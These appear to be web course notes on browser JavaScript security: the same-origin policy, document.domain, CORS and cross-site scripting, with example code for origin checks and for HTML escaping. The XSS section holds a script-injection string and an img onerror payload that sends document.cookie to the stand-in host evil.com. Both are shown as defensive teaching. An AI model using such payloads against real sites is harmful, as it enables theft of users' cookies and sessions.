Internet Seminar, Fall 2021, course site

js security

Many operations are not allowed from JavaScript in a client browser. For example,

same-origin , part 1

JavaScript in one window can't look at or modify anything in another window that's showing a document from a different origin (scheme, host and port; in the usual case, a different server).

 +- window 1 ----------------------------+
 | http://marlboro.edu/home.html         |
 |   <script src=/scripts/stuff.js>      |
 |   <script src=http://oz.com/magic.js> |
 +---------------------------------------+
    This window's document came from marlboro.edu, so that is
    the origin every script in it runs under.
    The JavaScript in both stuff.js and magic.js
    can only interact with documents from marlboro.edu.
    In particular, neither of these scripts can look
    at cookies or alter forms from amazon.com's 'window 2' below.

 +- window 2 ----------------------+
 | http://amazon.com/home.html     |  
 |                                 |
 +---------------------------------+

If, say, magic.js could interact with window 2's document, it could for example change the amazon window's <form action=URL> to any URL it wanted; then when you went to buy some books, you'd be sending your credit card information somewhere else entirely.

same-origin , part 2

Scripts that make their own HTTP requests for more data (AJAX, i.e. XMLHttpRequest or fetch) can by default only read responses from the origin the document came from.

 +- window 1 ----------------------------------------+
 | http://marlboro.edu/home.html                     |
 |   <script src=/scripts/ajax.js>                   |
 |     ... can talk to http://marlboro.edu/data.xml  |
 |   <script src=http://oz.com/ajax2.js>             |
 |     ... can *not* talk to http://oz.com/spy.xml   |
 +---------------------------------------------------+
    This document is from marlboro.edu.
    Any additional HTTP requests from JavaScript running
    in this window can only read responses from marlboro.edu,
    unless the other server opts in with CORS headers.

Even though the ajax2.js file is from oz.com, it cannot use AJAX techniques to make an HTTP request back to oz.com and read the reply, because the document is from marlboro.edu - a different origin.

The point is to stop a script from reading data from another site you're logged in to (the browser would happily attach that site's cookies to the request) and passing it along to a site other than the one you're explicitly visiting. Note that what's restricted is reading the response; as the next section shows, a script can still make the browser send a request almost anywhere.

This restriction can be relaxed between subdomains of one site by setting document.domain: if a page at pages.company.com wanted its JavaScript to reach a window from data.company.com, both pages would set document.domain = 'company.com' (one side alone doesn't do it, and a page can only set it to its own host or a parent of it). That relaxation covers scripting between windows only, not AJAX; for cross-origin AJAX the other server has to opt in with CORS (an Access-Control-Allow-Origin header naming the requesting origin). document.domain is deprecated in current browsers, and CORS is the way to do this now.
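Here is the same-origin rule from parts 1 and 2, and the two relaxations just described, written out as the checks a browser performs. This is an added example, not code from the course notes; the site names are the ones used above, and the function names are my own. It runs in Node (it only needs the built-in URL class).

```javascript
// Added example, not from the course notes: the origin comparison a browser
// performs, and the two ways it can be relaxed (document.domain and CORS).

// An origin is scheme + host + port.  Path, query and fragment don't count.
// URL.host already includes the port when it is not the scheme's default.
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Part 2: may a script running in the document at docUrl read the response
// to a request it sent to targetUrl?  Same origin: yes.  Otherwise only if
// the *target* server opted in with an Access-Control-Allow-Origin header
// (CORS) naming the document's origin exactly, or '*'.  The browser may
// still send the request; CORS decides whether the script sees the answer.
function canReadResponse(docUrl, targetUrl, allowOriginHeader) {
  if (sameOrigin(docUrl, targetUrl)) return true;
  if (allowOriginHeader === undefined || allowOriginHeader === null) return false;
  return allowOriginHeader === '*' || allowOriginHeader === originOf(docUrl);
}

// A page may set document.domain only to its own host or a parent of it
// (pages.company.com -> company.com is allowed, -> evil.com is not).
function mayRelaxTo(url, domain) {
  const host = new URL(url).hostname;
  return host === domain || host.endsWith('.' + domain);
}

// Part 1 with document.domain: two windows can script each other if they
// are same-origin, or if *both* have set document.domain to the same value
// that each is entitled to, over the same scheme.  Setting it on one side
// only does not help, and this relaxation never applies to AJAX requests.
// domainA / domainB are the values assigned to document.domain, or null.
function canScriptWindow(urlA, urlB, domainA, domainB) {
  if (domainA === null && domainB === null) return sameOrigin(urlA, urlB);
  if (domainA === null || domainB === null) return false;
  if (new URL(urlA).protocol !== new URL(urlB).protocol) return false;
  return domainA === domainB && mayRelaxTo(urlA, domainA) && mayRelaxTo(urlB, domainB);
}
```

Note that a scheme or port difference alone (http vs https, or :8080) is already a different origin, which is why the check compares the whole triple rather than just the host name.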

JavaScript security vs HTML security

Be clear that the restrictions above apply to what the JavaScript program can do, not what tags in the HTML can do.

Image tags, for example, can request a URL from anywhere, and the request carries whatever was put into that URL. This is commonly used for purposes other than just images, such as hit counters or tracking; such things are often called 'web bugs' or tracking pixels.

Likewise, you can put any URL you want in a 'script' tag, which will load and run the JavaScript from that URL ... which may in turn create other 'script' tags in the document which may load other scripts. Those scripts can do whatever they want to your web page - with your implicit permission; you referenced 'em - so make sure that you trust them.

Cross-site scripting attacks

To be secure, you must make sure that anything entered by the user isn't 'leaking out' somewhere unexpected. You do this by checking that they input what you want, and only what you want, and by escaping it when you put it into the page so the browser treats it as text rather than as tags.

For example, if you ask them for their name in a form, and then use JavaScript to stick it into a webpage, so that

user: Jim

turns into

<p>Hi Jim</p>

they might instead type

user: Eve<script src='http://evil.com/i_own_your_page.js'></script>

which if just stuck into your page as HTML would load their JavaScript ... which could do anything it wanted to your page. (One wrinkle: a <script> tag inserted with innerHTML does not execute, but something like <img src=x onerror=...> inserted the same way does, so the fix is to escape the input or assign it with textContent, not to hunt for the word 'script'.)
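The greeting from the paragraph above, written the vulnerable way and the hardened way, with the two checks a practitioner would actually apply: an allow-list on the input and escaping on output. This is an added example, not code from the course notes; the payloads, the name allow-list and the helper names are constructed for it. It runs in Node, so the page is modelled as a string; in a real page the hardened version is the textContent assignment mentioned in the comment.

```javascript
// Added example, not from the course notes: the greeting from the text,
// the vulnerable way and the hardened way.  Payloads, the allow-list and
// the helper names are constructed for this example.

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value.  Do this at the point where the string
// becomes markup, whatever validation happened earlier.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: whatever the user typed becomes part of the page's markup.
function greetUnsafe(name) {
  return `<p>Hi ${name}</p>`;
}

// HARDENED: the browser sees the user's text as text, never as tags.
function greetSafe(name) {
  return `<p>Hi ${escapeHtml(name)}</p>`;
}

// Input check: is this plausibly a name, and only a name?  Letters, spaces,
// dots, apostrophes and hyphens, 1 to 64 characters.  This is the "what you
// want, and only what you want" check; it complements escaping, it does not
// replace it (a name like O'Brien is legitimate and still needs escaping).
const NAME_RE = /^\p{L}[\p{L} .'-]{0,63}$/u;
function isPlausibleName(name) {
  return NAME_RE.test(name);
}

// Crude check used only to show the difference below: does the markup
// contain a real script element, an event-handler attribute inside a tag,
// or a javascript: URL?
function hasActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=|href\s*=\s*["']?javascript:/i.test(html);
}

// Constructed inputs.
const benignName = 'Jim';
// The payload from the notes above.
const scriptPayload = "Eve<script src='http://evil.com/i_own_your_page.js'></script>";
// If the page inserts the string with el.innerHTML, a <script> element added
// that way does not execute, but an event-handler attribute does, so a real
// attacker reaches for this form instead:
const handlerPayload = '<img src=x onerror="fetch(\'http://evil.com/?c=\' + document.cookie)">';

// In a live page the equivalent of greetSafe is
//   p.textContent = 'Hi ' + name;      // and never: p.innerHTML = 'Hi ' + name
```

The allow-list rejects both payloads outright, which is the first line of defence; the escaping is what still protects you when the input field is something looser than a name (a comment, an address) and an allow-list cannot be that tight.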

For another example, see When Trinity Hacked the IRS D-Base at the Hacker Challenges page at counterhack.net.

https://cs.bennington.college/courses/fall2021/internet/notes/js_security
last modified Wed September 1 2021 2:56 pm